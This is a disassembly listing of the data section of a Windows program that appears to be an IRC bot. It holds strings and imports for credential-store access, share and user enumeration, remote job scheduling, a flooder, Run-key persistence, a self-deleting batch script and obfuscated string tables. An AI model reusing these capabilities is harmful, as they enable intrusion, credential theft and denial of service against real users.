aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h ; DATA XREF: sub_403FE5:loc_403FFD�o
dword_418A1C dd 9EC09195h, 0D0A198ABh, 0B6B0BEADh, 8Fh, 0 ; DATA XREF: sub_4043E9+6�o
dword_418A30 dd 2E3031h ; DATA XREF: sub_4041B7+56�o
dword_418A34 dd 2E323931h, 2E383631h, 0 ; DATA XREF: sub_4041B7+3B�o
dword_418A40 dd 2E323731h, 0 ; DATA XREF: sub_4041B7+20�o
dword_418A48 dd 2E373231h, 0 ; DATA XREF: sub_4041B7+5�o
dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; DATA XREF: sub_40D871+1CC�o
; sub_41113B+45A�o
dword_418A5C dd 313A3Ah ; DATA XREF: sub_40435B+42�o
dword_418A60 dd 7525h ; DATA XREF: sub_4055E5+458�o
; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; DATA XREF: sub_4055E5+31E�o
; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; .data:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365h ; DATA XREF: sub_4064BF+31�o
dword_418B54 dd 58323025h, 0 ; DATA XREF: sub_406722+266�o
; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; DATA XREF: sub_406722+201�o
; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; DATA XREF: sub_406722+1E3�o
; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset dword_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset loc_418D98
dd offset dword_418DA8
dd offset dword_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset dword_418C9C
dd offset dword_418C88
dd offset dword_418C6C
dd offset dword_418C5C
dd offset dword_418C6C
dd offset dword_418C4C
dd offset loc_418C24
dd offset dword_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 0C2D48FAFh, 0D8A189F2h, 0BD97B0BCh, 0DF85B08Fh, 0F5979287h
; DATA XREF: .data:00418BE4�o
dd 0D1A28AE5h, 0ACF5BAh, 0
dword_418C10 dd 0C0CF838Bh, 0DBBC95F1h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BE0�o
; ---------------------------------------------------------------------------
loc_418C24: ; DATA XREF: .data:00418BDC�o
mov ds:0F4DCC796h, eax
cdq
scasd
retf 0FFA1h
; ---------------------------------------------------------------------------
dw 0F3B0h
dd 0D48EB4B7h, 0D1F0C690h, 0DFB99FE9h, 0B68DB0B1h, 0D29EA389h
dd 87h, 0
dword_418C4C dd 0C3D08A83h, 0DBB69FB3h, 2 dup(0) ; DATA XREF: .data:00418BD8�o
dword_418C5C dd 0DFD89691h, 90B889D4h, 0BBE8ADh, 0 ; DATA XREF: .data:00418BD0�o
dword_418C6C dd 0DFD896B1h, 9EBC9FF1h, 80BCE59Bh, 0D483A682h, 0C0F6C68Fh
; DATA XREF: .data:00418BCC�o
; .data:00418BD4�o
dd 0EDh, 0
dword_418C88 dd 0DFD89691h, 0DDB889F1h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BC8�o
dword_418C9C dd 0D4D98FB5h, 9EBD8DF2h, 0A4AAF586h, 919CA794h, 0D5C58FA4h
; DATA XREF: .data:00418BC4�o
dd 0D2A29BEAh, 2 dup(0)
dword_418CBC dd 0D5C58F84h, 0D2A29BEAh, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BC0�o
dword_418CD0 dd 0D1D98FB5h, 0FFEE8AF0h, 0A7B0F5AFh, 2 dup(0) ; DATA XREF: .data:00418BBC�o
dword_418CE4 dd 0D1D98F95h, 0DBE08AF0h, 0F5B0h, 0 ; DATA XREF: .data:00418BB8�o
dword_418CF4 dd 0D4D98FB5h, 9EBD8DF2h, 0BFAEE88Dh, 0C392A794h, 2 dup(0)
; DATA XREF: .data:00418BB4�o
dword_418D0C dd 0DCC79E87h, 0CCAB88F2h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BB0�o
dword_418D20 dd 0F9D98F95h, 0D0A19DF2h, 0B6A6F5E6h, 2 dup(0) ; DATA XREF: .data:00418BA8�o
dword_418D34 dd 0D4D98FB5h, 9EBD8DF2h, 0BCB9FF84h, 0C1B6F595h, 0D3DE8A92h
; DATA XREF: .data:00418BA4�o
; .data:00418BAC�o
dd 0D1A78EFCh, 0A6h, 0
dword_418D54 dd 0DFD0898Eh, 0C6ABD4F3h, 0ADh, 0 ; DATA XREF: .data:00418BA0�o
dword_418D64 dd 0D5DE8AA1h, 0EDEE8EF3h, 0B6A8E2ADh, 0C4A5F589h, 0DDDE928Ch
; DATA XREF: .data:00418B9C�o
dd 0CC9EDAF8h, 0A0BBF3A7h, 88h, 0
dword_418D88 dd 0C3C59581h, 0DBB69FB3h, 2 dup(0) ; DATA XREF: .data:00418B98�o
; ---------------------------------------------------------------------------
loc_418D98: ; DATA XREF: .data:00418B90�o
stosd
xchg eax, ebp
setalc
retn
; ---------------------------------------------------------------------------
dd 0C6ABD4EEh, 0ADh, 0
dword_418DA8 dd 0D1D489AEh, 0DB9DDAF1h, 0BAACE5ABh, 0F0D7AC8Fh, 0DFDF9297h
; DATA XREF: .data:off_418B8C�o
; .data:00418B94�o
dd 0C7BA93EFh, 0A1BBC3E8h, 0D494BC8Dh, 2 dup(0)
dword_418DD0 dd 0D1C4958Eh, 0C6ABD4EEh, 0ADh, 0 ; DATA XREF: .data:off_418B88�o
dword_418DE0 dd 293Ah ; DATA XREF: sub_406A23+9C�o
dword_418DE4 dd 5Ch ; DATA XREF: sub_406A23+1B�o
; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65h ; DATA XREF: sub_406B81+1B�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64h ; DATA XREF: sub_40732D:loc_407423�o
dword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; DATA XREF: sub_407928+4C�o
; sub_407928+96�o ...
dword_418F50 dd 30h ; DATA XREF: sub_407E0C+CB�o
; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; DATA XREF: sub_407F3D+118�o
; sub_40806A+BD�o
dword_418F60 dd 9ED9958Fh, 0A395FEh, 0 ; DATA XREF: sub_408887+6�o
; ---------------------------------------------------------------------------
loc_418F6C: ; DATA XREF: sub_408887+14�o
xchg eax, ebp
xchg eax, ecx
rcr byte ptr [esi-33436017h], 0A9h
mov esi, 0FB96BCBDh
xchg eax, ebp
retn
; ---------------------------------------------------------------------------
dd 2 dup(0)
dword_418F84 dd 9ED9958Fh, 9FF9h, 0 ; DATA XREF: sub_408887+22�o
; ---------------------------------------------------------------------------
loc_418F90: ; DATA XREF: sub_408887+30�o
xchg al, [edi-6B4C223Eh]
stosd
retf 0
; ---------------------------------------------------------------------------
align 10h
dword_418FA0 dd 0D7D88985h, 0DFE09FF1h, 0ADh, 0 ; DATA XREF: sub_408887+3E�o
dword_418FB0 dd 0D5D98F8Ch, 90A089F0h, 0FDB3FFABh, 0A09Ah, 0 ; DATA XREF: sub_408887+4C�o
off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset loc_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 0DEC08986h, 0DAAF95F1h, 0BEBFF7E6h, 0C8D9A69Eh, 0DFD88E83h
; DATA XREF: .data:00418FD8�o
dd 0D3A199B3h, 0BEBFF7E7h, 0D5D8A69Eh, 0DCD9918Dh, 91AA9BF2h
dd 0BDB9F9BBh, 0C1D8B19Eh, 0D1D4968Dh, 0DFB7D5EDh, 8CB1FFA0h
dd 0D49DB099h, 0D5DB8395h, 0CA91C8F9h, 0E2F3A1A5h, 0D48FB0D5h
dd 2 dup(0)
dword_41903C dd 0D7999597h, 0CDAB97FCh, 0BAA7BEF9h, 0D2D9B296h, 8B8Dh
; DATA XREF: .data:00418FD4�o
dd 0
dword_419054 dd 0DEC08986h, 0DAAF95F1h, 0E2F1A3E7h, 82D8B3D4h, 818380D3h
; DATA XREF: .data:00418FD0�o
dd 93F9C8A9h, 0B6EAA0F0h, 0D7CFE1D6h, 0D38FCBDBh, 8BE3C2ACh
dd 0EABAA1A9h, 89C2B7C8h, 9FD2D5D7h, 0CDAF89F0h, 0FDBDFEB1h
dd 92AD9Eh, 0
dword_419098 dd 0DEC08986h, 0DAAF95F1h, 0B0B7FDE6h, 0DE84BA89h, 0D3999284h
; DATA XREF: .data:00418FCC�o
dd 97F2h, 0
; ---------------------------------------------------------------------------
loc_4190B4: ; DATA XREF: .data:off_418FC8�o
xchg al, [edi-604D2E3Dh]
mov al, ds:0B9F9AA91h
cld
cwde
mov al, ds:8887C385h
retn
; ---------------------------------------------------------------------------
db 9Fh
dd 0D9A195DAh, 0BC8AF5A4h, 0D095B994h, 0C3D9AF90h, 0D2A29BE9h
dd 0B6F0E2ADh, 0B083h, 0
dword_4190E8 dd 0DCD88996h, 90BC9BFFh, 0B4B1FFAFh, 0D2D9B097h, 8B8Dh
; DATA XREF: .data:off_418FC4�o
dd 0
dword_419100 dd 415355h ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; DATA XREF: sub_4083AD:loc_4086C8�o
; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; DATA XREF: sub_408E8E+6�r
; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0 ; DATA XREF: sub_408F2E+1ED�o
dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; DATA XREF: sub_408F2E+17C�o
; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_4093B6+67�o
aBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0 ; DATA XREF: sub_409AD5+DA�o
dword_4194CC dd 3430032Dh, 2037802h ; DATA XREF: sub_409AD5:loc_409B25�o
aNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h ; DATA XREF: sub_40A2D2+159�o
dword_419660 dd 0A0D7325h, 0 ; DATA XREF: sub_40A2D2+6E�o
dword_419668 dd 3334h ; DATA XREF: sub_40A2D2+41�o
dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 0D9D88E95h, 0CCAFD4EEh, 0BDF0FEA1h, 0A19Eh, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 259B8h ; DATA XREF: sub_40A9CF+1ECD�r
align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 577ED30h ; DATA XREF: sub_40A9CF+1C87�r
dd 2 dup(0)
dword_419788 dd 5658h ; DATA XREF: sub_40A9CF+1C72�r
align 10h
dword_419790 dd 4827598h ; DATA XREF: sub_40A9CF+1C4B�r
dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 2DEB94F9h ; DATA XREF: sub_40A9CF+1BE9�r
dd 3 dup(0)
dword_4197B4 dd 2E6BE5C8h ; DATA XREF: sub_40A9CF+1BC2�r
align 10h
dword_4197C0 dd 2E5B8h ; DATA XREF: sub_40A9CF+1BAD�r
align 8
dword_4197C8 dd 2495E5C8h ; DATA XREF: sub_40A9CF+1B86�r
dd 2 dup(0)
dword_4197D4 dd 24858h ; DATA XREF: sub_40A9CF+1B71�r
dd 0
dword_4197DC dd 21DFB0F8h ; DATA XREF: sub_40A9CF+1B36�r
dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 26809888h ; DATA XREF: sub_40A9CF+1AFC�r
dd 2 dup(0)
dword_419818 dd 266E8h ; DATA XREF: sub_40A9CF+1AE7�r
align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 91DF38h ; DATA XREF: sub_40A9CF+19B1�r
dd 2 dup(0)
dword_419844 dd 2343003h, 2037325h ; DATA XREF: sub_40A9CF+1992�o
aHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 42A40FB6h ; DATA XREF: sub_40A9CF+180B�r
dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 151858h ; DATA XREF: sub_40A9CF+1710�r
align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; DATA XREF: sub_40A9CF:loc_40BFBA�o
; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 24858h ; DATA XREF: sub_40A9CF+1534�r
dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0B7DFB102h ; DATA XREF: sub_40A9CF+14F5�r
dd 3 dup(0)
dword_41999C dd 4B836E8h ; DATA XREF: sub_40A9CF+14E0�r
dd 2 dup(0)
dword_4199A8 dd 3E08h ; DATA XREF: sub_40A9CF+14B2�r
align 10h
dword_4199B0 dd 952EF8h ; DATA XREF: sub_40A9CF+1484�r
dd 2 dup(0)
dword_4199BC dd 22F78h ; DATA XREF: sub_40A9CF+146F�r
dd 0
dword_4199C4 dd 59D83703h ; DATA XREF: sub_40A9CF+1450�r
dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
